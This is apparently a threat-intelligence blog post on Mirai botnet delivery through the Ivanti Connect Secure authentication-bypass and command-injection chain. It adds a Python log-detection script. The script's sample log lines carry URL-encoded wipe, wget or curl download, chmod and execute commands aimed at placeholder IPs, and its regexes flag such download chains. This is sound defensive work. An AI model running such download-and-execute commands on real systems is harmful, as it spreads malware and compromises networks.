Juniper Threat Labs has been monitoring exploitation attempts targeting the Ivanti Pulse Secure authentication bypass and remote code execution vulnerabilities.
We have observed instances of Mirai botnet delivery in the wild that use this exploit chain to achieve remote code execution on the appliance.
Because the exploit provides a malware delivery path, it poses a significant threat of whole-network compromise.
In the subsequent analysis, we will explore the vulnerability, its exploitation methods, the observed payload, and discuss Juniper's response to this threat.
CVE-2023-46805 - An authentication bypass affecting both Ivanti Connect Secure (ICS) and Ivanti Policy Secure that enables a remote attacker to gain unauthorized access to restricted resources by circumventing control checks.
By chaining the authentication bypass with the path traversal vulnerability, attackers can reach sensitive resources.
CVE-2024-21887 - A command injection flaw in the web components of Ivanti Connect Secure and Ivanti Policy Secure that enables an attacker to send specially crafted requests which execute arbitrary commands on the appliance.
Notably, this vulnerability is exploitable over the internet.
Others have observed instances in the wild where attackers exploited this vulnerability using both curl- and Python-based reverse shells, enabling them to take control of vulnerable systems.
More recently, we have encountered Mirai payloads delivered through shell scripts.
This command sequence attempts to wipe files, download a script from a remote server, set executable permissions on it, and execute the script, potentially leaving the system infected.
This set of commands attempts to change into several system directories in turn.
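The two command sequences described above (wipe, download, chmod, execute; and hopping between system directories before fetching a payload) are a recognisable download-and-execute chain. The following is an added detection example written for this post; it is not code from Juniper Threat Labs or from the original article. It URL-decodes the request fragment recorded in a web access log, matches each stage of the chain with a regular expression, and raises an alert only when a download is paired with at least one other stage. The log format, the field names and the sample log lines are all constructed assumptions for the example; the IP addresses and URL are documentation ranges, not observed indicators.

```python
import re
from urllib.parse import unquote
from typing import Dict, List

# Constructed sample access-log lines (not from the original post). Assumed format:
# <client ip> "<METHOD> <path>" <status> "<request body or query fragment>"
SAMPLE_LOGS = [
    '203.0.113.7 "POST /api/example" 200 "cmd=id"',
    '203.0.113.9 "GET /api/example" 200 '
    '"cmd=rm%20-rf%20%2Ftmp%2F*%3Bwget%20http%3A%2F%2F198.51.100.5%2Fx.sh%3Bchmod%20%2Bx%20x.sh%3B.%2Fx.sh"',
    '198.51.100.12 "GET /example/login" 200 ""',
    '203.0.113.9 "POST /api/example" 200 '
    '"cmd=cd%20%2Ftmp%3Bcd%20%2Fvar%2Frun%3Bcd%20%2Fmnt%3Bcurl%20-O%20http%3A%2F%2F198.51.100.5%2Fbot"',
]

# One regular expression per stage of the chain described in the post.
# Only non-capturing groups are used so that findall() returns whole matches.
STAGE_PATTERNS: Dict[str, re.Pattern] = {
    "wipe":     re.compile(r"\brm\s+-[a-z]*r[a-z]*\s+\S+", re.I),          # rm -rf <path>
    "download": re.compile(r"\b(?:wget|curl|tftp)\b[^;&|]*https?://[^\s;&|'\"]+", re.I),
    "chmod":    re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b", re.I),     # chmod +x / chmod 777
    "execute":  re.compile(r"(?:^|[;&|]\s*)(?:\./\S+|(?:sh|bash)\s+\S+)", re.I),
    "dir_hop":  re.compile(r"\bcd\s+/\S+", re.I),                           # cd /tmp; cd /mnt; ...
}

URL_RE = re.compile(r"https?://[^\s;&|'\"]+")

# Assumed log layout; adjust the regex to the appliance's real access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<path>\S+)" (?P<status>\d{3}) "(?P<body>.*)"$'
)


def decode_request(fragment: str) -> str:
    """URL-decode twice (double encoding is a common evasion) and collapse whitespace."""
    text = unquote(unquote(fragment))
    return re.sub(r"\s+", " ", text).strip()


def analyze_request(fragment: str) -> Dict[str, object]:
    """Classify one request fragment by which stages of the chain it contains."""
    text = decode_request(fragment)
    hits = {name: pat.findall(text) for name, pat in STAGE_PATTERNS.items()}
    stages = [name for name, found in hits.items() if found]
    # A single "cd /dir" is normal; the post describes hopping across several directories.
    if "dir_hop" in stages and len(hits["dir_hop"]) < 2:
        stages.remove("dir_hop")
    urls = URL_RE.findall(text)
    # Alert when a remote download is combined with any other stage of the chain.
    suspicious = ("download" in stages) and (len(stages) >= 2)
    return {"decoded": text, "stages": stages, "urls": urls, "suspicious": suspicious}


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one alert record per log line whose request matches the chain."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        result = analyze_request(m.group("body"))
        if result["suspicious"]:
            alerts.append({"ip": m.group("ip"), "path": m.group("path"), **result})
    return alerts


if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(alert["ip"], alert["path"], alert["stages"], alert["urls"])
```

The download URLs collected in each alert are the values worth forwarding to blocking and threat-intelligence tooling, and the per-stage breakdown makes it easy to tune the alert threshold if a given environment legitimately issues wget or curl through the same interface.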
Juniper Threat Labs obtained and analyzed the payloads and identified them as Mirai botnets.
The growing number of attempts to exploit Ivanti Pulse Secure's authentication bypass and remote code execution vulnerabilities represents a significant threat to network security.
The discovery of Mirai botnet delivery through these exploits highlights the ever-evolving landscape of cyber threats.
Given that Mirai was delivered through this vulnerability, the deployment of other harmful malware and ransomware by the same route should also be expected.
Understanding how these vulnerabilities can be exploited and recognizing the specific threats they pose is crucial for protecting against potential risks.
Mitigating these risks involves applying the patches provided by Ivanti to address the identified vulnerabilities.
Juniper ATP Cloud offers protection against Mirai and other malware, while the use of IDP signatures helps prevent exploit attacks at the network level.
Juniper ATP Cloud detects Mirai using machine learning based on static and behavioral analysis.
Originally published on blogs.juniper.net. Publication date: Thu, 09 May 2024 14:43:06 +0000